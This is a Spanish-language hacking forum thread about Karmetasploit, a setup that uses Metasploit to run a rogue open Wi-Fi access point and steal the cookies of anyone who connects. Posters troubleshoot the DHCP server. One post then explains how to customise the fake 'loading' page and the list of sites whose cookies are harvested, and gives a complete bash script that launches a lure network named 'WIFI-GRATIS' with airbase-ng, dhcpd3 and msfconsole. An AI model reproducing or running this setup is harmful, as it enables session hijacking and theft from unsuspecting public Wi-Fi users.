[Metasploit] Karmetasploit

Iniciado por Shell Root, 6 Enero 2010, 02:14 AM

0 Miembros y 4 Visitantes están viendo este tema.

trashhgoo

KIETO AHI! SALE LOADING...?

Si la respuesta es SI, es normal, es una web fake k captura las cookies.

Solo aceptamos conexiones entrantes, no ofrecemos una redireccion hacia afuera!

pepeluxx

Hola de nuevo ...

Me he fijado que cuando arranco el dhcpd me dice esto:


Wrote 1 leases to leases file.


Cuando veo que debe salir esto:


root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.2
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.


Qué os crea en /var/lib/dhcp3/dhcpd.leasses ???

pepeluxx

Cita de: pepeluxx en  9 Enero 2010, 17:28 PM
Hola de nuevo ...

Me he fijado que cuando arranco el dhcpd me dice esto:


Wrote 0 leases to leases file.


Cuando veo que debe salir esto:


root@trashhgoo:/home/trashhgoo# dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
Internet Systems Consortium DHCP Server V3.1.2
Copyright 2004-2008 Internet Systems Consortium.
All rights reserved.
For info, please visit http://www.isc.org/sw/dhcp/
Wrote 1 leases to leases file.


Qué os crea en /var/lib/dhcp3/dhcpd.leasses ???


trashhgoo

# The format of this file is documented in the dhcpd.leases(5) manual page.
# This lease file was written by isc-dhcp-V3.1.2

lease 10.0.0.102 {
  starts 2 2010/01/05 22:58:10;
  ends 2 2010/01/05 22:59:22;
  tstp 2 2010/01/05 22:59:22;
  cltt 2 2010/01/05 22:58:10;
  binding state free;
  hardware ethernet 00:21:00:95:26:b3;
}

pepeluxx

Pues a mi no me crea nada ... se supone que 00:21:00:95:26:b3 es la mac de at0 ?

trashhgoo

Estas mirandolo bien? Ejecutandolo con prilevios de administrador?
Por lo que tengo entendido es el archivo donde se guardan los datos de los clientes de la red, de cuando se les asigna una IP.

Así que supongo que /var/lib/dhcp3/dhcpd.leases OJO, ES LEASES, no LEASSES es la tabla ARP. No lo puedo decir a ciencia cierta, es simplemente una suposición.  :silbar:

pepeluxx

Pues debía ser cosa de mi linux (o de mi wifi) porque probé en otro PC y va bien :)

gracias

trashhgoo

Me alegro de que lo consiguieras, eso es que el tutorial está bien escrito. Muchas gracias a ti.

Un saludo

pepeluxx

#18
No se si lo sabeis pero  es posible modificar la página que sale por defecto (una negra que pone loading ...) cambiando /opt/metasploit3/msf3/data/exploits/capture/http/index.html y personalizarla a nuestro gusto

Además también se pueden personalizar las urls de donde se intenta extraer la cookie con el fichero /opt/metasploit3/msf3/data/exploits/capture/http/sites.txt

Un pequeño script que arrancaría todo de golpe podría ser:


#!/bin/bash
killall -9 dhcpd3 airbase-ng
airmon-ng start ath0
airbase-ng -P -C 30 -e "WIFI-GRATIS" -v ath1 >/dev/null 2>&1 &
sleep 2
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
sleep 2
rm /var/lib/dhcp3/dhcpd.leases 2>/dev/null
dhcpd3 -cf /etc/dhcp3/dhcpd.conf at0
msfconsole -r karma.rc


saludos

trashhgoo

Es una buena idea la de facilitar el trabajo con un script. Si no te importa, lo añadiré al tutorial original.  ;-)